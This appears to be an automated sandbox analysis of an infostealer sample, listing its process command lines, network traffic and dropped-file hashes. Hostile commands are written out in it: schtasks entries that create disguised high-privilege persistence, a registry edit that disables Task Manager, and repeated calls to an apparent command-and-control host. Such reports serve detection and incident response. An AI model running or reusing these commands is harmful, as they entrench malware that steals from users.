schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\dllhost.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc73393a-21db-4920-aef5-89bb6e511a85.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1fd5334d-3292-4a4f-ba80-ecac0649ffbc.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9845c9f8-f68f-44c0-8a0f-ab509582ad2d.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9553ac34-d8bb-4793-9745-28b9055e89ec.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92b637a2-a0f8-4de9-8f88-3395212ea9ff.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a46ec459-c490-4bc4-95f6-b2f98b27fed0.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\247a55d3-4a2a-4013-90a7-551e0dba8375.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\52c39398-c77a-4017-b39e-c4305685083f.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65e39de4-b06e-47c9-a366-406fdb705992.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23970f29-63ea-4a42-89d3-82a0294c6654.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9631333a-2d67-4b6c-ab49-1152cf25e131.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\90768ac9-f677-4eca-bfa6-2c2289da3535.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b3188dd-0e79-4205-9c12-221b928853cf.vbs"

C:\Users\All Users\OfficeClickToRun.exe

"C:\Users\All Users\OfficeClickToRun.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4fb73f37-69ab-4c36-839e-63fba0405246.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\964d59a8-da7c-427a-9df7-83d092a74dec.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 a0947008.xsph.ru udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 103.192.8.141.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 48.251.17.2.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp

Files

memory/3572-0-0x0000000000400000-0x000000000084E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\stealer.exe

MD5 8cc1e7cf94fec9bc505ce7411aa28861
SHA1 08703de84f3db427c368f16c873664d78bd83264
SHA256 cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba
SHA512 fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

memory/2088-62-0x00007FFBA56C3000-0x00007FFBA56C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

MD5 6216b6bef94c09a40bfa263809b1ae56
SHA1 a928120e65199c6aaae6c991aa0466f3f8b06020
SHA256 eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b
SHA512 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

memory/2088-86-0x00000243043D0000-0x0000024304410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Inject.exe

MD5 d428ddd1b0ce85a6c96765aeaf246320
SHA1 d100efdaab5b2ad851fe75a28d0aa95deb920926
SHA256 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb
SHA512 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

memory/2088-126-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp

memory/4460-127-0x00007FF702DA0000-0x00007FF702DCA000-memory.dmp

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

MD5 7c9bb5fda146efee5ee4a243d6e404b0
SHA1 c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA256 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

memory/4772-137-0x000001B9C2140000-0x000001B9C2162000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5s40mlo.qt2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/2088-163-0x000002431EB00000-0x000002431EB76000-memory.dmp

memory/2088-164-0x000002431EB80000-0x000002431EBD0000-memory.dmp

memory/2088-165-0x000002431EA90000-0x000002431EAAE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a58f982c18490e622e00d4eb75ace5a
SHA1 60c30527b74659ecf09089a5a7c02a1df9a71b65
SHA256 4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512 ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/2088-202-0x000002431ECD0000-0x000002431ECE2000-memory.dmp

memory/2088-201-0x000002431EAC0000-0x000002431EACA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ec79fae4e7c09310ebf4f2d85a33a638
SHA1 f2bdd995b12e65e7ed437d228f22223b59e76efb
SHA256 e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a
SHA512 af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

MD5 ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1 252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA256 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA512 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

C:\MsWinsessiondllNet\driverBrokercommon.exe

MD5 d84e590c3715c79dc5b92c435957d162
SHA1 2901580903e4b356448d9fe7bea510261e655363
SHA256 d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512 b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

memory/3532-221-0x0000000000830000-0x0000000000A7A000-memory.dmp

memory/2088-225-0x00007FFBA56C0000-0x00007FFBA6181000-memory.dmp

memory/3532-227-0x00000000013E0000-0x00000000013E8000-memory.dmp

memory/3532-226-0x00000000013D0000-0x00000000013D8000-memory.dmp

memory/3532-228-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/3532-229-0x0000000002CB0000-0x0000000002D06000-memory.dmp

memory/3532-231-0x0000000002D10000-0x0000000002D1C000-memory.dmp

memory/3532-230-0x0000000002D00000-0x0000000002D0C000-memory.dmp

memory/3532-232-0x0000000002D20000-0x0000000002D2C000-memory.dmp

memory/3532-234-0x0000000002D40000-0x0000000002D4A000-memory.dmp

memory/3532-235-0x0000000002D50000-0x0000000002D5E000-memory.dmp

memory/3532-236-0x0000000002E80000-0x0000000002E88000-memory.dmp

memory/3532-237-0x0000000002E90000-0x0000000002E9A000-memory.dmp

memory/3532-233-0x0000000002D30000-0x0000000002D38000-memory.dmp

memory/3532-238-0x0000000002EA0000-0x0000000002EAC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat

MD5 9bb7d27e4566ce09ef791f86b09732fe
SHA1 9b7e5becf0e6dcf48a2ed150aaad53333bbfb48c
SHA256 ba97fedd893a3a6de6acfd327b5463342a494f539165238e835043fecf6d97d8
SHA512 f30137d111300079993005ef3232b888515181ed700ac13c66e980f01b1cb98536446027c10d4a6a3c6962a09846b0d1931c97f28b92ddc6c44260e4830fbb9d

C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs

MD5 0e92844c30f1e233ad4b8044fa3cd673
SHA1 080ea409adc4d3744ed5c4712f36ef88a94a375a
SHA256 2d3ff981e4fe3853973230b37292eee9290362d7a07d9fa0f317c2ffcea3961c
SHA512 a95efc157bfd7ea44965438eb6f2b021434ad052a8dfbab38be476d15fab008cea2efd914f1bfb489e1f1aa8541e2f5164905c0aca998285cce260f0387bb9d4

C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs

MD5 e10487abf474865152575b2cd81910c0
SHA1 4f1c99557da2d0685d6f86e42f5e5bf76c8f5921
SHA256 6bd19066ea6ce1863ff93bf9aead7a58ea2332660def11379be9c55d1a03a3bd
SHA512 dc19bda7aeb827158be95c2d2ac9820ece72ad66139847142a155ddab2faf874edb06e60b3f6c2483847edd4af539585de0871d483e2dad3bf3461bd8fc1679b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeClickToRun.exe.log

MD5 5cb90c90e96a3b36461ed44d339d02e5
SHA1 5508281a22cca7757bc4fbdb0a8e885c9f596a04
SHA256 34c15d8e79fef4bddec7e34f3426df3b68f8fc6deac29ea12d110f6c529fe3bb
SHA512 63735938c841c28824e3482559df18839930acc5ea8600b1074439b70a2f600a92f41593568e49991f25f079e7f7361b4f1678feadbf004f6e9e4d51d36598d4

C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs

MD5 d549be64163140865839441e3ef85f15
SHA1 0c0de615fd32af9055dd383956ea9977be025d59
SHA256 e1334fe8bedb10b2cef710c633d2069c0d53330fc750ac0a863cf7b82cd9cc4e
SHA512 ba7f134bb8adfc57791454fe20df24df94fe9280d0e27e8047d636f2a3ca76d7978417f7e652f98c3ba4c60ce7542a4d5954b9762fdefa501aad2648ed645851

C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs

MD5 4f32bce711ca904bb6878ce4bef41d41
SHA1 a3b6c98a5fa59212895dc2a77318b39b4a7e3f3c
SHA256 5dac33fef0ff4414fe21e048fce3ddf901526237fb168db55723c975bbc52d1e
SHA512 4e42efc2ead154c196aa2a5da95c992fe433de998f518b29d51aef64ab95be6256de2dea5ced7ef84e73ff87aae1b2a4caa07ab2af8dabe23dc2efe395b3c1df

C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs

MD5 d86460fade326da57ff0e0a6ce851553
SHA1 d312d12d6e864dfc628370fb35a637a4360082c3
SHA256 35a91c57dd4a033599b4940d426a43d0a91d2c5a1c21d89dd2a287b8face2db4
SHA512 bc59142fe7ee449925972e9a77ec93490d520af8d02e648f81fe3af8aa7755709e617d1bc83df67400ef3ac115436160a66a38f6b0087d3fbdcfb955049ea004

C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs

MD5 6ad35a059bcbda82c5bd886d3717fd49
SHA1 d8475f059324e5a52e3ea2af8ed9513b22a32e6c
SHA256 03f1d446995f790aa4a55848c1161d28eb9526e6330c72d2058acc059a56137d
SHA512 751a09d4db1c6603cdecb025872f89d9697cd3dc541eb839926ebdcc7ebdbd37eadbb06e56aace9df6898538d67b2b0a47ee7d0a56c916aaa30ee485c2d918fb

C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs

MD5 fba285925e3d4a6934e8855c5a7f607b
SHA1 264d77d7cfe521b3ddb6320df5d9b7ac698cf82d
SHA256 0d0075c3672b522ada6ed8816b6c95fd462a9f8cd40bf46967bee68dd19b9acd
SHA512 408d57c114d490bc3a2f1f359af3a2b91a58f5da606157b7802b792c154b42d93c02a3e325ed105843b2034142ecb60fe0b2bc6a43d3d8b96028e0fac7e8edf2

C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs

MD5 5e753b39185bd2b6718b3ba7b82aa474
SHA1 a2a90bde15a46f2c451c51e9b2ba9de4faeb8144
SHA256 c769601789b806bf9c264920524f6b7ed27dd1d6eb01bf0020df10e9571c2748
SHA512 1c9b1147baeeae61b42ea6dd72590e78ae23d1e80e96f1df35fe51c24c2d21278bc8d0ec7e204c84a39776e13eaa2e22f66f787f45ec66d3323e51f2e9d6c9d5

C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs

MD5 133b0b141005878ef497aab0ed89d9e4
SHA1 c8313f29635593e1c11a68d89b97fb1f0a5c446b
SHA256 9351880bda96633971197caa9ec767802845d26e3dc5da268ab69299262519b3
SHA512 5a6868e827989cd48db3a2c9545baa3c1f1fd4fd2023529d69f08a13b0facf0c4c7b6e6621ed6be89909fa9a7473be5786e2c1e7caf3f7d656c6445821892963

C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs

MD5 670ca1952cf4cc3076532b671c86b6c0
SHA1 bcb4298927bf213a1e7d3496da7c1fc719541e14
SHA256 8fc1809d6c04c9922db24d125c43d67f939f44b202051dd72103c87afd252a03
SHA512 24331c612d4aafcf61074b77078cdb9e67ffbd0c4614d4965b6678ed97957d16d14f563404f3e6ab102e23dc6208eff5a798008d8858019246e567789759c806

C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs

MD5 1ee3ad79e53f9daf6cb84a9fbe7b14ec
SHA1 8315aea769144989b55d61d7bfc8267eefd5f47f
SHA256 7587b5c9b7e1476869d96641a5f5d5364938d202cd2c364a58cfce5a3a5a4bfb
SHA512 4d7177fb926f140461f0fe6858cdd8b0c0936d957c67961df53e6cd0b13753b6a7e7e2865589172a17ffced01b362be4e225fdabb2e1acceaa3c3d92fb275eac

C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs

MD5 fee8ac1bc4a472ec1285bf070266d40d
SHA1 f12a85efe00a4a40a4d5a0b88df142c9e9387d35
SHA256 49231d4f5941440bb49df789d982dd3fc87f4fa8397a4cd8183285f0a27e67eb
SHA512 4f37e77031939a900408a3ea4f25b975c5e67e3ca71ab825b764a497c263fffca5fb0284365a163476ba245d08ca7a1b8278a04f1a62bfadfea2d50da69dbfc3

C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs

MD5 94ae98a099f9e20d7e8514bf87603751
SHA1 dfac2e0cf4d915abdac2f149b7be3172d15ddff8
SHA256 8dd75515a9b4690a3eb907418696de48c2c42750cf530fa78f99d6151dfec7ca
SHA512 7a8c4debeef65e95f3264204e04d976e34ffdf9ef7c530c2583e16dfa04ebc1d045be923111e9402a5ab7d833ed54040ccdcd07a768da7794ef963e09b58d32e